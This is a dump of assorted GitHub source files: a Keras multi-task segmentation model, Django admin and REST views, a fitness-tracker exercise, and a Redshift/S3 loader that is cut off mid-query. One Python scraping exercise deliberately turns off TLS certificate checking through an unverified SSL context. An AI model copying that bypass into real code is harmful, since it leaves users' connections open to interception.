+{"seq_id": "17287407374", "text": "\"\"\"\nCreated on Mon Oct 17 17:24:42 2016\n@author: Ruobing Huang\n\"\"\"\n\nfrom __future__ import print_function\nfrom keras.models import Model\nfrom keras.layers import Input, merge, Convolution2D, MaxPooling2D, UpSampling2D\nfrom keras.layers import Dropout, Activation\nfrom keras.optimizers import SGD, RMSprop\nimport pdb\n\nimage_length =128\nimage_width =128\nimage_height =128\n\ndef get_unet():\n inputs = Input((image_length, image_width, image_height), name = 'input')\n conv1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(inputs)\n conv1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n\n conv2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(pool1)\n conv2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n \n conv3 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(pool2)\n conv3 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n \n # ==========================================================================\n conv4 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(pool3)\n drop4 = Dropout(0.5)(conv4)\n conv4 = Convolution2D(512, 3, 3, activation='relu', border_mode='same',dim_ordering = 'tf',init=\"orthogonal\")(drop4)\n conv4 = Dropout(0.5)(conv4)\n # ==========================================================================\n # Task 1\n # ==========================================================================\n t1_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t1_act5 = merge([UpSampling2D(size=(2, 2))(t1_conv5), conv3], mode='concat', concat_axis= -1)\n \n t1_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t1_act5)\n t1_act6 = merge([UpSampling2D(size=(2, 2))(t1_conv6), conv2], mode='concat', concat_axis= -1)\n \n t1_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task1_output')(t1_act6)\n # ==========================================================================\n # Task 2\n # ==========================================================================\n t2_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t2_act5 = merge([UpSampling2D(size=(2, 2))(t2_conv5), conv3], mode='concat', concat_axis= -1)\n \n t2_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t2_act5)\n t2_act6 = merge([UpSampling2D(size=(2, 2))(t2_conv6), conv2], mode='concat', concat_axis= -1)\n \n t2_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task2_output')(t2_act6)\n # ==========================================================================\n # Task 3\n # ==========================================================================\n t3_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t3_act5 = merge([UpSampling2D(size=(2, 2))(t3_conv5), conv3], mode='concat', concat_axis= -1)\n \n t3_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t3_act5)\n t3_act6 = merge([UpSampling2D(size=(2, 2))(t3_conv6), conv2], mode='concat', concat_axis= -1)\n\n t3_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task3_output')(t3_act6)\n # ==========================================================================\n # Task 4\n # ==========================================================================\n t4_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t4_act5 = merge([UpSampling2D(size=(2, 2))(t4_conv5), conv3], mode='concat', concat_axis= -1)\n \n t4_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t4_act5)\n t4_act6 = merge([UpSampling2D(size=(2, 2))(t4_conv6), conv2], mode='concat', concat_axis= -1)\n \n t4_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal', name='task4_output')(t4_act6)\n \n # ==========================================================================\n # Task 5\n # ==========================================================================\n t5_conv5 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(conv4)\n t5_act5 = merge([UpSampling2D(size=(2, 2))(t5_conv5), conv3], mode='concat', concat_axis= -1)\n \n t5_conv6 = Convolution2D(256, 3, 3, activation = 'relu', init = 'orthogonal', dim_ordering = 'tf',border_mode='same')(t5_act5)\n t5_act6 = merge([UpSampling2D(size=(2, 2))(t5_conv6), conv2], mode='concat', concat_axis= -1)\n \n t5_pred = Convolution2D(1, 1, 1, activation='sigmoid',dim_ordering = 'tf',init='orthogonal',name='task5_output')(t5_act6)\n # ==========================================================================\n model = Model(input = inputs, output= [t1_pred, t2_pred, t3_pred, t4_pred, t5_pred])\n # ==========================================================================\n opt = RMSprop(lr = 1e-3)\n model.compile(optimizer = opt,\n loss={'task1_output': 'binary_crossentropy',\n 'task2_output': 'binary_crossentropy',\n 'task3_output': 'binary_crossentropy',\n 'task4_output': 'binary_crossentropy',\n 'task5_output': 'binary_crossentropy'},\n metrics={'task1_output': 'acc',\n 'task2_output': 'acc',\n 'task3_output': 'acc',\n 'task4_output': 'acc',\n 'task5_output': 'acc'},\n loss_weights = {'task1_output': 1,\n 'task2_output': 1,\n 'task3_output': 1,\n 'task4_output': 1,\n 'task5_output': 1})\n return model", "repo_name": "cloudy-toast/Multi_S_CNN", "sub_path": "build_multi_model.py", "file_name": "build_multi_model.py", "file_ext": "py", "file_size_in_byte": 6918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.layers.Input", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 70, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.layers.merge", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.UpSampling2D", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.Convolution2D", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "28596199650", "text": "\"\"\"\nhttp: 明文传输\nhttps: http + ssl, 需要证书\n\n\n\n\n\"\"\"\nimport ssl\nfrom urllib.request import Request, urlopen\nfrom fake_useragent import UserAgent\n\nurl = \"https://www.12306.cn/index/index.html\"\n\nheaders = {\n 'user-agent': UserAgent().chrome\n}\nrequest = Request(url, headers=headers)\n\n# 忽略验证证书:\ncontext = ssl._create_unverified_context()\nprint(context) # \nresponse = urlopen(request, context=context)\nresponse = urlopen(request)\n\ninfo = response.read().decode()\nprint(info)\n", "repo_name": "WakingHours-GitHub/PythonSpider", "sub_path": "1_urllib的使用/8_http请求.py", "file_name": "8_http请求.py", "file_ext": "py", "file_size_in_byte": 541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fake_useragent.UserAgent", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 18, "usage_type": "call"}, {"api_name": "ssl._create_unverified_context", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 23, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "29990916294", "text": "from django.contrib import admin, messages\n\n# Register your models here.\nfrom api.models import (\n Category,\n Check,\n CheckOutCondition,\n CheckOutProcess,\n Item,\n Location,\n Person,\n Preset,\n)\n\n\nclass ItemAdmin(admin.ModelAdmin):\n list_display = [field.name for field in Item._meta.fields if field.name != \"id\"]\n\n\nadmin.site.register(Category)\nadmin.site.register(Location)\nadmin.site.register(Preset)\nadmin.site.register(Item, ItemAdmin)\nadmin.site.register(Person)\nadmin.site.register(CheckOutProcess)\nadmin.site.register(Check)\n\n\nclass CheckOutConditionAdmin(admin.ModelAdmin):\n actions = [\"make_default\"]\n\n def make_default(self, request, queryset):\n if queryset.count() > 1:\n self.message_user(\n request,\n \"Es kann nur eine Bedingung als Standard festgelegt werden.\",\n level=messages.ERROR,\n )\n return\n cond = queryset[0]\n cond.default = True\n cond.save()\n\n make_default.short_description = \"Als Standard festlegen\"\n list_display = (\"text\", \"default\")\n\n\nadmin.site.register(CheckOutCondition, CheckOutConditionAdmin)\n", "repo_name": "elgohr-update/tinventory", "sub_path": "web/api/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 16, "usage_type": "name"}, {"api_name": "api.models.Item._meta", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api.models.Item", "line_number": 17, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 20, "usage_type": "call"}, {"api_name": "api.models.Category", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 20, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 21, "usage_type": "call"}, {"api_name": "api.models.Location", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 22, "usage_type": "call"}, {"api_name": "api.models.Preset", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 23, "usage_type": "call"}, {"api_name": "api.models.Item", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 24, "usage_type": "call"}, {"api_name": "api.models.Person", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 24, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 25, "usage_type": "call"}, {"api_name": "api.models.CheckOutProcess", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 26, "usage_type": "call"}, {"api_name": "api.models.Check", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}, {"api_name": "django.contrib.messages.ERROR", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 37, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 48, "usage_type": "call"}, {"api_name": "api.models.CheckOutCondition", "line_number": 48, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 48, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 48, "usage_type": "name"}]}
+{"seq_id": "8889566311", "text": "\"\"\"Fitness tracker module ver.1.0.4 alpha\"\"\"\n\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass InfoMessage:\n \"\"\"Информационное сообщение о тренировке.\"\"\"\n training_type: str\n duration: float\n distance: float\n speed: float\n calories: int\n pass\n\n def get_message(self) -> str:\n return (f'Тип тренировки: {self.training_type}; '\n f'Длительность: {self.duration:.3f} ч.; '\n f'Дистанция: {self.distance:.3f} км; '\n f'Ср. скорость: {self.speed:.3f} км/ч; '\n f'Потрачено ккал: {self.calories:.3f}.')\n\n\n@dataclass\nclass Training:\n \"\"\"Базовый класс тренировки.\"\"\"\n\n LEN_STEP = 0.65\n M_IN_KM = 1000\n\n action: int\n duration: float\n weight: float\n\n def get_spent_calories(self):\n pass\n\n def get_distance(self) -> float:\n \"\"\"Получить дистанцию в км.\"\"\"\n dist = self.action * self.LEN_STEP / self.M_IN_KM\n return dist\n\n def get_mean_speed(self) -> float:\n \"\"\"Получить среднюю скорость движения.\"\"\"\n speed = self.get_distance() / self.duration\n return speed\n\n def show_training_info(self) -> InfoMessage:\n \"\"\"Вернуть информационное сообщение о выполненной тренировке.\"\"\"\n training_type = self.__class__.__name__\n distance_info = self.get_distance()\n speed_info = self.get_mean_speed()\n calories_info = self.get_spent_calories()\n msg = InfoMessage(\n training_type, self.duration,\n distance_info, speed_info, calories_info)\n return msg\n\n\nclass Running(Training):\n \"\"\"Тренировка: бег.\"\"\"\n\n def get_spent_calories(self):\n speed_ave = self.get_mean_speed()\n COEFF_CAL_1 = 18\n COEFF_CAL_2 = 20\n min_in_hour = 60\n count_calories = (\n (COEFF_CAL_1 * speed_ave - COEFF_CAL_2)\n * self.weight / self.M_IN_KM * self.duration * min_in_hour)\n return count_calories\n\n\n@dataclass\nclass SportsWalking(Training):\n \"\"\"Тренировка: спортивная ходьба.\"\"\"\n\n height: int\n\n def get_spent_calories(self):\n speed_ave = self.get_mean_speed()\n COEFF_CAL_1 = 0.035\n COEFF_CAL_2 = 0.029\n min_in_hour = 60\n count_calories = (\n (COEFF_CAL_1 * self.weight\n + (speed_ave**2 // self.height)\n * COEFF_CAL_2 * self.weight)\n * self.duration * min_in_hour)\n return count_calories\n\n\n@dataclass\nclass Swimming(Training):\n \"\"\"Тренировка: плавание.\"\"\"\n\n LEN_STEP = 1.38\n\n length_pool: int\n count_pool: int\n\n def get_mean_speed(self):\n speed_ave = (\n self.length_pool * self.count_pool / self.M_IN_KM / self.duration)\n return speed_ave\n\n def get_spent_calories(self):\n speed_ave = self.get_mean_speed()\n COEFF_CAL_1 = 1.1\n COEFF_CAL_2 = 2\n count_calories = (\n (speed_ave + COEFF_CAL_1)\n * COEFF_CAL_2 * self.weight)\n return count_calories\n\n\ndef read_package(workout_type: str, data: list) -> Training:\n \"\"\"Прочитать данные полученные от датчиков.\"\"\"\n dict_of_actions = {'SWM': Swimming,\n 'RUN': Running,\n 'WLK': SportsWalking}\n try:\n if workout_type in dict_of_actions:\n i = dict_of_actions[workout_type](*data)\n return i\n except Exception:\n print('Error')\n\n\ndef main(training: Training) -> None:\n \"\"\"Главная функция.\"\"\"\n info = training.show_training_info()\n msg = info.get_message()\n print(msg)\n return\n\n\nif __name__ == '__main__':\n packages = [\n ('SWM', [720, 1, 80, 25, 40]),\n ('RUN', [15000, 1, 75]),\n ('WLK', [9000, 1, 75, 180]),\n ]\n\n for workout_type, data in packages:\n training = read_package(workout_type, data)\n main(training)\n", "repo_name": "areyouright/python", "sub_path": "homework.py", "file_name": "homework.py", "file_ext": "py", "file_size_in_byte": 4169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataclasses.dataclass", "line_number": 6, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 24, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 74, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 93, "usage_type": "name"}]}
+{"seq_id": "14944624503", "text": "from django.shortcuts import get_object_or_404\nfrom rest_framework import (\n filters,\n mixins,\n permissions,\n status,\n views,\n viewsets\n)\nfrom rest_framework.response import Response\n\nfrom api.permissions import AdminOrReadOnly\nfrom api.serializers import (\n AltDeleteItemsSerialSerializer,\n CategorySerializer,\n CategorySerializerGet,\n ItemSerializer,\n NameSerializer,\n NameSerializerGet,\n PostItemsSerialSerializer\n)\nfrom store.models import Category, Item, Name\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n permission_classes = (AdminOrReadOnly, )\n def get_serializer_class(self):\n if self.action == 'retrieve':\n return CategorySerializerGet\n return CategorySerializer \n\nclass ItemViewSet(viewsets.ModelViewSet):\n queryset = Item.objects.all()\n serializer_class = ItemSerializer\n permission_classes = (AdminOrReadOnly, )\n\nclass NameViewSet(viewsets.ModelViewSet):\n queryset = Name.objects.all()\n serializer_class = NameSerializer\n permission_classes = (AdminOrReadOnly, )\n \n def get_serializer_class(self):\n if self.action == 'retrieve':\n return NameSerializerGet\n return NameSerializer \n\n def perform_create(self, serializer):\n category= self.request.data.get('category')\n category = get_object_or_404(Category, id=category)\n serializer.save(category = category)\n\nclass PostItemsSerialViews(views.APIView):\n \"\"\"\n Гипотетическая необходимость создать Items одинаковой модели(Name),\n передавая в JSON только серийные номера, Name в слаге.\n \"\"\"\n permission_classes = (permissions.IsAdminUser,)\n\n def post(self, request, name_id):\n data = request.data.get('model_items')\n serializer = PostItemsSerialSerializer(\n data=data, many=True,\n context={'name_id': name_id, 'request': request})\n if serializer.is_valid():\n serializer.save()\n serializer = ItemSerializer(\n instance=serializer.instance,\n context={'request': self.request},\n many=True)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass DeleteItemsSerialViews(views.APIView):\n \"\"\"\n Гипотетическая необходимость удалить любые Items,\n передавая в JSON только серийные номера.\n Upd. Удаляет все Items которые найдет,\n остальные вернет с ошибкой.\n \"\"\"\n permission_classes = (permissions.IsAdminUser,)\n\n def delete(self, request):\n data_set = request.data.get('model_items')\n data_success = {}\n lists_error = []\n for data in data_set:\n item_serial = data['serial_num']\n if Item.objects.filter(serial_num = item_serial).exists():\n data_success[item_serial] = 'Item успешно удален'\n Item.objects.filter(serial_num = item_serial).delete()\n else:\n lists_error.append({'serial_num': item_serial})\n data_success['error'] = lists_error\n if 'error' in data_success:\n data_success['error_info'] = 'серийные(й) номера отсутствуют.'\n i_status = status.HTTP_400_BAD_REQUEST\n else:\n i_status = status.HTTP_204_NO_CONTENT\n return Response(data_success, status=i_status) \n\nclass AltDeleteItemsSerialViews(views.APIView):\n \"\"\"\n Альтернативный метод удаления по серийникам.\n Удаляет только если все серийные номера - валидны.\n \"\"\"\n permission_classes = (permissions.IsAdminUser,)\n\n def delete(self, request):\n data_set = request.data.get('model_items')\n serializer = AltDeleteItemsSerialSerializer(\n data=data_set, many=True)\n serializer.is_valid(raise_exception=True)\n for data in serializer.validated_data:\n data.delete()\n return Response(status=status.HTTP_204_NO_CONTENT) \n", "repo_name": "ZOMini/computer_store", "sub_path": "c_store/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 25, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 25, "usage_type": "name"}, {"api_name": "store.models.Category.objects.all", "line_number": 26, "usage_type": "call"}, {"api_name": "store.models.Category.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "store.models.Category", "line_number": 26, "usage_type": "name"}, {"api_name": "api.serializers.CategorySerializer", "line_number": 27, "usage_type": "name"}, {"api_name": "api.permissions.AdminOrReadOnly", "line_number": 28, "usage_type": "name"}, {"api_name": "api.serializers.CategorySerializerGet", "line_number": 31, "usage_type": "name"}, {"api_name": "api.serializers.CategorySerializer", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 34, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 34, "usage_type": "name"}, {"api_name": "store.models.Item.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "store.models.Item.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "store.models.Item", "line_number": 35, "usage_type": "name"}, {"api_name": "api.serializers.ItemSerializer", "line_number": 36, "usage_type": "name"}, {"api_name": "api.permissions.AdminOrReadOnly", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 39, "usage_type": "name"}, {"api_name": "store.models.Name.objects.all", "line_number": 40, "usage_type": "call"}, {"api_name": "store.models.Name.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "store.models.Name", "line_number": 40, "usage_type": "name"}, {"api_name": "api.serializers.NameSerializer", "line_number": 41, "usage_type": "name"}, {"api_name": "api.permissions.AdminOrReadOnly", "line_number": 42, "usage_type": "name"}, {"api_name": "api.serializers.NameSerializerGet", "line_number": 46, "usage_type": "name"}, {"api_name": "api.serializers.NameSerializer", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 51, "usage_type": "call"}, {"api_name": "store.models.Category", "line_number": 51, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 54, "usage_type": "attribute"}, {"api_name": "rest_framework.views", "line_number": 54, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 59, "usage_type": "name"}, {"api_name": "api.serializers.PostItemsSerialSerializer", "line_number": 63, "usage_type": "call"}, {"api_name": "api.serializers.ItemSerializer", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 72, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 72, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 73, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 73, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 76, "usage_type": "attribute"}, {"api_name": "rest_framework.views", "line_number": 76, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 83, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 83, "usage_type": "name"}, {"api_name": "store.models.Item.objects.filter", "line_number": 91, "usage_type": "call"}, {"api_name": "store.models.Item.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "store.models.Item", "line_number": 91, "usage_type": "name"}, {"api_name": "store.models.Item.objects.filter", "line_number": 93, "usage_type": "call"}, {"api_name": "store.models.Item.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": "store.models.Item", "line_number": 93, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 99, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 99, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 101, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 102, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 104, "usage_type": "attribute"}, {"api_name": "rest_framework.views", "line_number": 104, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 109, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 109, "usage_type": "name"}, {"api_name": "api.serializers.AltDeleteItemsSerialSerializer", "line_number": 113, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 118, "usage_type": "name"}]}
+{"seq_id": "4337144771", "text": "import boto3\nfrom boto3.s3.transfer import S3Transfer\nfrom boto.s3.connection import S3Connection, Bucket, Key\nimport logging\nimport numpy as np\nimport pandas as pd\nimport pdb\nimport psycopg2\n\nlogger=logging.getLogger(__name__)\n\ntableName = ''\nlakeUser = ''\nlakePassword = ''\n\npeProdRedshiftAccessKey = ''\npeProdRedshiftSecretAccessKey = ''\nbucketName = ''\nschemaName = ''\nlakeDBName = ''\nlakeHost = ''\nlakePort = 5439\n\nlakeConnection = psycopg2.connect(dbname=lakeDBName,\n host=lakeHost,\n port=lakePort,\n user=lakeUser,\n password=lakePassword)\n\nisFirstRun=False\n\ndef remove_delimiters (delimiters, s):\n new_s = str(s)\n for i in delimiters: \n new_s = new_s.replace(i, ' ')\n return ' '.join(new_s.split())\n\ndef push_file(fileName):\n output=pd.read_csv(fileName,parse_dates=['create_time'])\n push_to_s3(output=output,fileName=fileName)\n if isFirstRun:\n# try:\n# drop()\n# except:\n# pass\n create()\n push_to_redshift()\n \ndef push_to_s3(output=None,fileName=None):\n client = boto3.client('s3', aws_access_key_id=peProdRedshiftAccessKey,\n aws_secret_access_key=peProdRedshiftSecretAccessKey)\n transfer = S3Transfer(client)\n transfer.upload_file(fileName, 'pe-prod-redshift',\n 'adhoc_upload_files'+'/'+'Pred_SA_{}.csv'.format(output.create_time.max().date().strftime('%Y-%m-%d')))\n logger.info(\"File copied.\")\n\ndef push_to_redshift():\n lakeCursor = lakeConnection.cursor()\n logger.info(schemaName+\"\"\".\"\"\"+tableName)\n logger.warning(\"Deleting Table\")\n lakeCursor.execute(\"DELETE \"+schemaName+\"\"\".\"\"\"+tableName+\";\")\n lakeCursor.execute(\"COMMIT;\")\n lakeCursor.execute(\"END;\")\n logger.warning(\"Reinitializing tables\")\n lakeInsertQuery = \"\"\"\n COPY \"\"\" + schemaName + \"\"\".\"\"\" + tableName + \"\"\"\n FROM\n 